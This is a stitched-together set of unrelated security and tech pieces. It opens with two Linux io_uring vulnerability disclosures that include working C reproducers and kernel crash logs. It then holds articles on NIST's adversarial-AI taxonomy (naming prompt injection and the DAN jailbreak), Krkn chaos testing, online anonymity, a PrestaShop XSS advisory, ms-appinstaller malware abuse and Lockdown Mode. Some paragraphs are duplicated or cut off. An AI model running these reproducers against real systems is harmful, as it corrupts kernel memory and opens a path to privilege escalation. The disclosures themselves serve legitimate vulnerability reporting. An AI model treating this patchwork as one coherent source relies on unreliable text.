Linux versions 6.4 and above suffer from an io_uring page use-after-free vulnerability via buffer ring mmap.

    Linux >=6.4: io_uring: page UAF via buffer ring mmapSince commit c56e022c0a27 (\"io_uring: add support for user mapped providedbuffer ring\"), landed in Linux 6.4, io_uring makes it possible to allocate,mmap, and deallocate \"buffer rings\".A \"buffer ring\" can be allocated withio_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocatedwith io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).It can be mapped into userspace using mmap() with offsetIORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MMsubsystem will treat the mapping as a set of opaque page frame numbers notassociated with any corresponding pages; this implies that the calling code isresponsible for ensuring that the mapped memory can not be freed before theuserspace mapping is removed.However, there is no mechanism to ensure this in io_uring: It is possible tojust register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and thenfree the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving freepages mapped into userspace, which is a fairly easily exploitable situation.reproducer:==============================================================#define _GNU_SOURCE#include <unistd.h>#include <err.h>#include <string.h>#include <stdio.h>#include <ctype.h>#include <sys/syscall.h>#include <sys/mman.h>#include <linux/io_uring.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})int main(void) {  struct io_uring_params params = {    .flags = IORING_SETUP_NO_SQARRAY  };  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));  printf(\"uring_fd = %d\\", uring_fd);  struct io_uring_buf_reg reg = {    .ring_entries = 1,    .bgid = 0,    .flags = IOU_PBUF_RING_MMAP  };  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));  void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));  printf(\"pbuf mapped at %p\\", pbuf_mapping);  struct io_uring_buf_reg unreg = { .bgid = 0 };  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));  while (1) {    memset(pbuf_mapping, 0xaa, 0x1000);    usleep(100000);  }}==============================================================When run on a system with the debug options:    CONFIG_PAGE_TABLE_CHECK=y    CONFIG_PAGE_TABLE_CHECK_ENFORCED=y, this will splat with the following error, when __page_table_check_zero()detects that a page that's being freed is still mapped into userspace:==============================================================------------[ cut here ]------------kernel BUG at mm/page_table_check.c:146!invalid opcode: 0000 [#1] PREEMPT SMP KASANCPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014RIP: 0010:__page_table_check_zero+0x136/0x150Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ffRSP: 0018:ffff888029aa7c70 EFLAGS: 00010202RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13eR10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000FS:  00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0PKRU: 55555554Call Trace: <TASK>[...] free_unref_page_prepare+0x282/0x450 free_unref_page+0x45/0x170 __io_remove_buffers.part.0+0x38c/0x3c0 io_unregister_pbuf_ring+0x146/0x1e0[...] __do_sys_io_uring_register+0xa03/0x11c0[...] do_syscall_64+0x43/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76RIP: 0033:0x7f745ef4bf59Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001abRAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000 </TASK>Modules linked in:---[ end trace 0000000000000000 ]---==============================================================When run on a system without those options, this reproducer will randomlycorrupt memory and probably on most runs crash the machine.I tried it once and after I tried using some other programs, I got some randomkernel #GP fault.One way to fix this might be to add some mapping counter to`struct io_buffer_list`, and then: - increment that counter in io_uring_validate_mmap_request() for PBUF_RING   mappings - increment that counter in the vm_area_operations ->open() handler - decrement that counter in the vm_area_operations ->close() handler - refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?Or alternatively free the io_buffer_list when the counter drops to zero, and letthe counter start at 1.(I'm not sure what the lifetime rules for other accesses to the io_buffer_list'smemory are - it looks like most paths only access the io_buffer_list under somelock? Is the idea that the kernel actually accesses the buffer through userspacepointers, or something like that? I'll have to stare at this some more before Iunderstand it...)This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-02-26.Found by: jannh@google.com

Linux 6.4 io_uring Use-After-Free

__io_uaddr_map() in io_uring suffers from dangerous handling of the multi-page region.

    io_uring: __io_uaddr_map() handles multi-page region dangerously__io_uaddr_map() wants to import a region from userspace, and then address theimported region through the linear mapping area. This requires that theimported region is physically contiguous.A comment in __io_uaddr_map() explains that the imported region is usuallyjust a single page, in which case that is trivially fine.However, __io_uaddr_map() also has code intended to permit multi-page regions,in which case it tries to enforce that the entire region maps to the samefolio (in other words, the same head page):        /*         * Should be a single page. If the ring is small enough that we can         * use a normal page, that is fine. If we need multiple pages, then         * userspace should use a huge page. That's the only way to guarantee         * that we get contigious memory, outside of just being lucky or         * (currently) having low memory fragmentation.         */        if (page_array[0] != page_array[ret - 1])                goto err;This code is wrong for (more or less) two reasons:1. It only checks the first and last page; it doesn't check any of the pages   in between. Userspace can easily create a set of adjacent VMAs such that   the first and last virtual page map to the same physical page, while pages   in between map to entirely unrelated pages.2. It misunderstands how compound pages are represented in the kernel, and   will always reject the case it is supposed to allow:   `pin_user_pages_fast()` would return a set of adjacent `struct page`   instances that are associated with the same head page / folio; it   wouldn't return the same `struct page *` for every subpage.   Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`.So if this code is presented with a userspace region of the following shape,containing individual 4K pages:[page A][page B][...][page A]then it will accept the region and assume that `page_to_virt(<page A>)`returns the address of a page as big as the entire region. Accesses to thefirst 4KiB of the region would work as intended; but accesses to later partsof the region will be out-of-bounds accesses to unrelated pages.Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until itoverruns the end of the first sq page:```#define _GNU_SOURCE#include <unistd.h>#include <err.h>#include <stdio.h>#include <sys/mman.h>#include <sys/syscall.h>#include <linux/io_uring.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})#define NUM_SQ_PAGES 4int main(void) {  int memfd_sq = SYSCHK(memfd_create(\"\", 0));  int memfd_cq = SYSCHK(memfd_create(\"\", 0));  SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));  SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));  // sq  void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));  SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));  // cq (rings)  void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));  *(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;  for (int i=1; i<NUM_SQ_PAGES; i++)    SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));  struct io_uring_params params = {    .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,    .sq_off = {      .user_addr = (unsigned long)sq_data    },    .cq_off = {      .user_addr = (unsigned long)cq_data    }  };  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));  printf(\"uring_fd = %d\\", uring_fd);  /* submit nops */  int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));  printf(\"enter returned %d\\", enter_res);}```It gives an ASAN splat like this (but note that the splat diagnostic is wrong because ASAN can't detect page OOB access properly):```[   73.380288] ==================================================================[   73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00[   73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708[   73.383967] [   73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357[   73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014[   73.386778] Call Trace:[   73.387177]  <TASK>[   73.387520]  dump_stack_lvl+0x4a/0x80[   73.388117]  print_report+0xcf/0x670[...][   73.389595]  kasan_report+0xd8/0x110[...][   73.391954]  io_submit_sqes+0x223/0xc00[   73.392570]  __do_sys_io_uring_enter+0x965/0x1200[...][   73.397438]  do_syscall_64+0x46/0xf0[   73.398004]  entry_SYSCALL_64_after_hwframe+0x6e/0x76[   73.398787] RIP: 0033:0x7ff8ed2e7989[   73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48[   73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa[   73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989[   73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005[   73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100[   73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0[   73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000[   73.419272]  </TASK>[removed irrelevant alloc/free traces of the accessed memory region][   73.449202] [   73.449471] The buggy address belongs to the object at ffff88810263a000[   73.449471]  which belongs to the cache kmalloc-128 of size 128[   73.451228] The buggy address is located 0 bytes inside of[   73.451228]  freed 128-byte region [ffff88810263a000, ffff88810263a080)[   73.453173] [   73.453429] The buggy address belongs to the physical page:[   73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a[   73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0[   73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)[   73.457522] page_type: 0xffffffff()[   73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002[   73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000[   73.460305] page dumped because: kasan: bad access detected[   73.461091] [   73.461353] Memory state around the buggy address:[   73.462038]  ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[   73.463058]  ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[   73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb[   73.465289]                    ^[   73.465791]  ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc[   73.466795]  ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb```I'm not sure about the best way to fix it - since the compound page supportcan't actually have worked, as explained above, maybe it's easiest to justdrop support for compound pages? \u03bfr alternatively we could fix that, but sincenobody seems to have used it, that'd maybe be unnecessary complexity...This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-02-22.Related CVE Numbers: CVE-2023-6560.Found by: jannh@google.com

io_uring __io_uaddr_map() Dangerous Multi-Page Handling

By Waqas
NIST Unveils Insights on AI Vulnerabilities and Potential Threats.w
This is a post from HackRead.com Read the original post: Poisoned Data, Malicious Manipulation: NIST Study Reveals AI Vulnerabilities

The National Institute of Standards and Technology (NIST) has exposed critical AI vulnerabilities that can be exploited by threat actors to create potential avenues for compromising AI systems.

In a comprehensive study, researchers at the National Institute of Standards and Technology (NIST) dug into the vulnerabilities in **artificial intelligence (AI)** systems, revealing the exploitation of untrustworthy data by adversaries and malicious threat actors.

Despite concerns, Artificial Intelligence has become a vital player in our lives. From **detecting dark web cyber attacks** to **diagnosing critical medical conditions** when doctors fall short, it is safe to say that AI is here to stay. However, it requires strong cybersecurity measures to prevent it from falling into the hands of malicious threat actors.

Therefore, the research, titled “Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations,” can be termed a significant contribution to the ongoing effort to establish trustworthy AI.

****AI Vulnerabilities Exposed: No Foolproof Defense****

NIST’s computer scientists have discussed the inherent risks associated with AI systems, revealing that attackers can intentionally manipulate or “poison” these systems to cause malfunction.

The publication emphasizes the absence of a foolproof defence mechanism against such adversarial attacks, urging developers and users to exercise caution amidst claims of impenetrable safeguards.

****AI in the Crosshairs: Understanding Attacks and Mitigations****

The **study** classifies major attacks into four categories: evasion, poisoning, privacy, and abuse. Evasion attacks aim to alter inputs post-deployment, while poisoning attacks introduce corrupted data during the training phase.

Privacy attacks occur during deployment, seeking to extract sensitive information for misuse, and abuse attacks involve inserting incorrect information into AI sources.

If an adversary manipulates an AI system’s decision-making, it can malfunction. For instance, in an “evasion” attack, misleading road markings could cause a driverless car to veer into oncoming traffic. NIST’s new publication outlines such adversarial tactics and suggests mitigation approaches. _Credit: N. Hanacek/NIST_

****Challenges and Mitigations:****

The research acknowledges the challenges in safeguarding AI from misdirection, particularly due to the massive datasets used in training, beyond the scope of human monitoring. NIST provides an overview of potential attacks and corresponding mitigation strategies, emphasizing the community’s need to enhance existing defences.

****AI’s Vulnerability Spotlight: The Human Element****

Highlighting real-world scenarios, the study explores how adversarial actors can exploit vulnerabilities in AI, resulting in undesirable behaviours. **Chatbots**, for instance, may respond with **abusive language** when manipulated by carefully crafted prompts, exposing the vulnerability of AI in handling diverse inputs. For the complete research material behind this study, visit **here** (PDF).

For insights into NIST’s latest study, we reached out to **Joseph Thacker**, principal AI engineer and security researcher at AppOmni, a SaaS security pioneer. Joseph told Hackread.com that NIST’s study is “the best AI security publication he has seen so far.

“This is the best AI security publication I’ve seen. What’s most noteworthy are the depth and coverage. It’s the most in-depth content about adversarial attacks on AI systems that I’ve encountered. It covers the different forms of prompt injection, elaborating and giving terminology for components that previously weren’t well-labelled,” noted Joseph.

“It even references prolific real-world examples like the DAN (Do Anything Now) jailbreak and some amazing indirect prompt injection work. It includes multiple sections covering potential mitigations but is clear about it not being a solved problem yet,” he added.

“There’s a helpful glossary at the end, which I personally plan to use as extra “context” to large language models when writing or researching AI security. It will make sure the LLM and I are working with the same definitions specific to this subject domain. Overall, I believe this is the most successful over-arching piece of content covering AI security,” Joseph emphasised.

****Developers’ Call to Action: Enhancing AI Defenses****

NIST encourages the developer community to assess and improve existing defences against adversarial attacks critically. The study, a collaborative effort between government, academia, and industry, provides a taxonomy of attacks and mitigations, recognizing the evolving nature of AI threats and the imperative to adapt defences accordingly.

****_RELATED ARTICLES_****

1.  **Malicious Abrax666 AI Chatbot Exposed as Potential Scam**
2.  **Dark Web Pedophiles Using Open-Source AI to Generate CSAM**
3.  **AI Model Listens to Typing, Potentially Compromising Sensitive Data**
4.  **AI-powered Customer Communication Platforms for Contact Centers**
5.  **Deepfakes Are Being Used to Circumvent Facial Recognition Systems**

Poisoned Data, Malicious Manipulation: NIST Study Reveals AI Vulnerabilities

There has been a huge increase in demand for running complex systems with tens to hundreds of microservices at massive scale. End users expect 24/7 availability of services they depend on, so even a few minutes of downtime matters. A proactive chaos engineer helps meet user expectations by identifying bottlenecks, hardening services before downtime occurs in a production environment. Chaos engineering is vital to avoid losing trust with your end users.To help address the need for a resilient Kubernetes platform and provide improved user experiences, Red Hat collaborates with the open source co

There has been a huge increase in demand for running complex systems with tens to hundreds of microservices at massive scale. End users expect 24/7 availability of services they depend on, so even a few minutes of downtime matters. A proactive chaos engineer helps meet user expectations by identifying bottlenecks, hardening services before downtime occurs in a production environment. Chaos engineering is vital to avoid losing trust with your end users.

To help address the need for a resilient Kubernetes platform and provide improved user experiences, Red Hat collaborates with the open source community and end users to build and maintain open source tools and chaos engineering frameworks such as Krkn. To get a sense of Krkn's capabilities, here are a few additional resources for insights and findings from chaos test runs.

With the increase in adoption of Krkn for a large number of products by the community and customers, we were facing challenges where artificial intelligence (AI) proved useful:

*   Adding and updating test cases as products get new features and fixes.
*   Adding and maintaining chaos test coverage for multiple products, which involves tracking them closely.
*   Running hundreds of test cases, instead of just the ones with a perceived high probability of disruption.

Red Hat Chaos Engineering and IBM Research teams are collaborating to integrate AI in Krkn for improved and automated test coverage that can help scale chaos testing efforts for multiple products running different architectures, node scale and traffic patterns.

**AI integration in Krkn use case**

With the increase in adoption of Krkn for chaos testing various products and configurations, test cases for good coverage have become complex. For instance, suppose you have an application stack with numerous deployments and pods must coordinate to serve user requests. To chaos test it, you must understand the architecture and design test cases depending on the nature of the service (dependency patterns of one microservice on one or more other services or resource intensive/CPU, memory, input/output operations per second, network or traffic patterns and so on).

To cover this, you'd need to run hundreds of test case iterations, requiring extensive human hours and potential cloud costs. Even with that effort, constant monitoring is necessary to look for missing edge cases, and to adapt test cases as the application stack evolves (feature additions, architecture changes and so on). It’s hard to predict the combination of scenarios when run against multiple pods, which can lead to missed Service Level Objectives (SLO) and degradation in performance, ultimately impacting the service.

Imagine doing this for a large number of products and applications. You can solve this with Chaos AI integration in Krkn. This is a classic example of how AI can adapt and assist in increasing the capabilities and solving complex problems.

The goal is for the deployed Chaos AI and Krkn framework to automatically discover and run scenarios impacting the service, and use reinforcement machine learning to adapt to changes in the product stack.

**Krkn**

Krkn is a chaos engine that can target cloud, Kubernetes and OpenShift APIs to inject failure conditions and track recovery of the targeted component, overall health of the cluster and performance SLOs.

**Chaos-recommender**

Given pointers to a service, chaos-recommender profiles each pod using Prometheus to understand whether they are network intensive or related to CPU, memory or I/O, and suggests to Krkn scenarios that have the highest probability of causing disruption.

**Krkn Telemetry**

When enabled, Krkn Telemetry captures and stores metrics, alerts, chaos parameters, test pass/fail and logs, in addition to environment details such as scale (number of nodes, pods, routes and so on), architecture (AMD, ARM, X86\_64), network plugin (SDN, OVN) and more. This data is used for training the AI/ML model to understand what components are failing often so that they can be tested more.

**Chaos AI workflow**

This is the end-to-end framework that takes Krkn scenarios and SLOs as input and, with help from chaos-recommender and Krkn-telemetry, assigns weight to components requiring testing and runs different combinations of scenarios against the application stack.

Here's an example workflow for Etcd and ApiServer:

**Step 1**

A user provides Etcd and ApiServer namespaces as targets and SLOs for the AI to check and reward on misses. For example:

*   openshift-etcd and openshift-apiserver are the namespace inputs
*   API server has 99% latency < 1 sec
*   SLO is that Etcd has leader elections < 0

**Step 2**

Chaos-AI triggers chaos-recommender. It profiles the Etcd and ApiServer namespaces to identify chaos scenarios that have high probability of getting disrupted based on resource usage metrics in prometheus.

**Step 3**

The Chaos-AI model is trained using reinforcement learning. Krkn-telemetry data on Etcd and ApiServer components is gathered to determine which pods and containers are failing often.

**Step 4**

Chaos-AI assigns weight based on Step 2 and Step 3 and runs Krkn scenarios. The reinforcement learning is based on a system where the framework rewards itself on missed SLOs. In this example, that happens when API latency is > 1 sec and Etcd goes through leader elections.

It also runs other areas that are least expected to be disrupted, but with fewer iterations. Suppose it finds a new component or combination failing often. This would get recorded in Krkn-telemetry and fed back to the model to be considered for the next iterations.

**Step 5**

Failures are output for you so you can address them.

This is a continuous process that adapts as the product evolves and identifies areas to improve without human intervention when there are potential missing edge cases.

**Use cases**

Instead of manually identifying and adding test cases in your product release CI, you can use this framework to automatically identify and run test cases, and even automatically adjust not only the components to target, but newly introduced components.

Better yet, you can easily add, scale and expand test coverage not only for Red Hat OpenShift but for the entire portfolio including Red Hat OpenShift Service on AWS, Red Hat OpenShift AI and more.

**What’s next?**

Krkn and Chaos AI integration helps you improve test coverage. It boosts confidence in your products and environment, and enables users to scale faster by increasing the number of products and application stacks they can test.

Stay tuned for results from the integration and findings in the coming blogs. As you can see, some of the pieces including Krkn, chaos-recommender and Krkn-telemetry are already open sourced and can be leveraged to test and harden your environment. We are actively working to open source the entire Chaos AI + Krkn framework.

Feedback and contributions are welcome. The code is on Github and of course we're more than happy to discuss and collaborate on your use cases.

Supercharging chaos testing using AI

Being fully anonymous is next to impossible—but you can significantly limit what the internet knows about you by sticking to a few basic rules.

Beyond the web, trackers embedded in your mobile applications can gather data on your activity. On Android, you should turn off personalized ads through Google’s My Ad Center, simply toggling the setting to off. Also, delete your device’s advertising ID by going to **Settings, Privacy**, **Ads** and clicking on the **Delete advertising ID** option. There are also Android apps that will block cross-app trackers, such as DuckDuckGo’s browser app or the University of Oxford–developed TrackerControl. If you use iOS, go to **Settings,** **Privacy & Security, Tracking,** and toggle off **Allow Apps to Request to Track** to stop apps from tracking you across apps and websites.

For some people, a VPN may be useful for stopping their internet service provider from viewing their web traffic. VPNs can, however, see your online activity—in some cases keeping logs of it—and many are problematic. Our is Mullvad’s VPN, which is open source and accepts payments via cash mailed to its offices in Sweden.

Pick the Most Private Option

Every app, website, and service you use is likely to collect some data about you, but some collect more than others. Picking services that purposefully don’t collect information about you or that use end-to-end encryption, which stops companies from seeing the contents of your communications or data transfers, can help limit your exposure to the web. Generally, you want to avoid Big Tech.

For messaging, Signal collects very little information about who uses it, and it’s encrypted by default, meaning it cannot see the contents of the messages you send. For searching, DuckDuckGo, Brave Search, Kagi, Startpage, and Mojeek are our picks of the most privacy friendly search engines. For email, Proton and Tuta (formerly Tutanota) provide free end-to-end encryption options. OnionShare uses the Tor network to allow you to anonymously share files. Proton Drive offers encrypted file storage online, and Apple’s advanced data protection settings allow iCloud storage to be end-to-end encrypted once it is enabled.

If you're using a work laptop or phone, it's also worth keeping in mind that your employer can likely see many, if not all, of the things you do on those devices. If you're searching for a new job or running personal tasks, you likely want to do them on personal devices.

Check What You Post

As much as anything, being more anonymous online is linked to your mentality. Simply put, the less you share about yourself online, the less identifiable you will be. That means being careful about what you post on social media—not sharing information that could identify you, your location, or others around you.

For instance, if you want to create a new social media account that’s not tied to your identity, keep any names or personal information out of the account name. You should also not sign up using your primary phone number, email address, physical address, or any similar information that could be linked back to you. This doesn’t apply just to a new account you’re creating; it should be the wider way you think about all of your online behavior.

How to Be More Anonymous Online

### Description
Some event attributes are not detected by the isCleanHTML method

### Impact
Some modules using the isCleanHTML method could be vulnerable to xss

### Patches
8.1.3, 1.7.8.11

### Workarounds
The best workaround is to use the `HTMLPurifier` library to sanitize html input coming from users. The library is already available as a dependency in the PrestaShop project. Beware though that in legacy object models, fields of `HTML` type will call `isCleanHTML`.

### Reporters

Reported by Antonio Russo (@Antonio-R1 on GitHub) and Antonio Rocco Spataro (@antoniospataro on GitHub).



**Package**

composer prestashop/prestashop (Composer)

**Affected versions**

\>= 8.0.0-beta.1, < 8.1.3

< 1.7.8.11

**Patched versions**

8.1.3

1.7.8.11

**Description**

**Description**

Some event attributes are not detected by the isCleanHTML method

**Impact**

Some modules using the isCleanHTML method could be vulnerable to xss

**Patches**

8.1.3, 1.7.8.11

**Workarounds**

The best workaround is to use the HTMLPurifier library to sanitize html input coming from users. The library is already available as a dependency in the PrestaShop project. Beware though that in legacy object models, fields of HTML type will call isCleanHTML.

**Reporters**

Reported by Antonio Russo (@Antonio-R1 on GitHub) and Antonio Rocco Spataro (@antoniospataro on GitHub).

**References**

*   GHSA-xgpm-q3mq-46rq
*   https://nvd.nist.gov/vuln/detail/CVE-2024-21627
*   PrestaShop/PrestaShop@0ed1af8
*   PrestaShop/PrestaShop@73cfb44
*   PrestaShop/PrestaShop@ba06d18
*   PrestaShop/PrestaShop@f799dcf

 matthieu-rolland published to PrestaShop/PrestaShop

Jan 2, 2024

Published by the National Vulnerability Database

Jan 2, 2024

Published to the GitHub Advisory Database

Jan 3, 2024

Reviewed

Jan 3, 2024

GHSA-xgpm-q3mq-46rq: PrestaShop some attribute not escaped in Validate::isCleanHTML method

Microsoft decided to disable App Installer links by default after it noticed several access brokers using the handler to spread malware.

In what might be conceived as one of Microsoft’s new year resolutions, it has disclosed that it’s turned off the ms-appinstaller protocol handler by default. The change is designed to make installing apps easier, but it also makes installing malware easier.

Typically, an app needs to be on a device before it can be installed, which normally means that a user has to download it first. To save time and disk space, Microsoft introduced the ability to install applications directly from a web server, without downloading it first. It relies on links that use the ms-appinstaller URI (Uniform Resource Identifier) scheme, which are handled by App Installer rather than a web browser. When software is installed this way users don’t see SmartScreen or browser warnings about downloaded executables.

Microsoft reports that it observed malicious activity where criminals tricked users into installing malware using ms-appinstaller links, allowing them to bypass mechanisms like SmartScreen that are designed to keep users safe.

Several cybercriminals were found selling a malware kit as a service that abuses the MSIX file format and ms-appinstaller protocol handler. They distribute signed malicious MSIX application packages using websites accessed through malicious advertisements for legitimate popular software.

The abuse was first noticed in November 2023. Several known groups were using it in different scenarios, all of which lead users to landing pages that mimicked legitimate software vendor sites, where the malware was available via ms-appinstaller links or malicious MSIX installers.

Cybercriminals used four different techniques to spread their malware:

*   **SEO poisoning**. Users who searched for legitimate software applications on Bing or Google were presented with search results for malicious landing pages.
*   **Malvertising**. Users searching for software were directed to malicious landing pages via search ads mimicking legitimate vendors.
*   **Teams messages**. Users were sent messages over Microsoft teams linking to malicious landing pages.
*   **Social engineering**. Microsoft showed an example of an employement opportunity site that tricked visitors into installing malware by saying it was a new PDF reader version that was required in order to view a document.

The criminal groups identified as using these methods were all initial access brokers (IABs). IABs are individuals or organizations that specialise in providing ransomware gangs with access to company networks.

Malicious installers can be spotted by looking at the publisher information in the ms-appinstaller prompt.

Image courtesy of Microsoft

To manually disable ms-appinstaller on your network, set the Group Policy EnableMSAppInstallerProtocol to disabled.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Microsoft disables ms-appinstaller after malicious use 

If you're at high risk of being targeted by mercenary spyware, or just don't mind losing iOS features for extra security, the company's restricted mode is surprisingly usable.

With the releases of iOS 16 and macOS Ventura in 2022, Apple debuted its Lockdown Mode for people at particular risk of being targeted by mercenary spyware. The feature is essentially a set of configurations for iOS and macOS that limit or block niceties like link previews in Messages and shared albums in Photos. Lockdown Mode also restricts your device's ability to accept unsolicited communications like FaceTime calls from phone numbers and accounts you've never called before. And this year, in iOS 17, Apple added additional improvements, meaning more safety-focused limitations. The company has consistently emphasized that Lockdown Mode is not meant for mainstream use by most people—but in a week of testing, it's surprisingly tolerable.

Turning on Lockdown Mode simply involves confirming the setting change with your device PIN or a biometric authentication in “Privacy & Security” and then rebooting so the system can apply all the restrictions and limitations. Enabling Lockdown Mode is similar to changing the language of your device—the system needs to comprehensively adopt the new configuration and apply it everywhere. Once the reboot is complete, your device comes back on looking pretty much like normal.

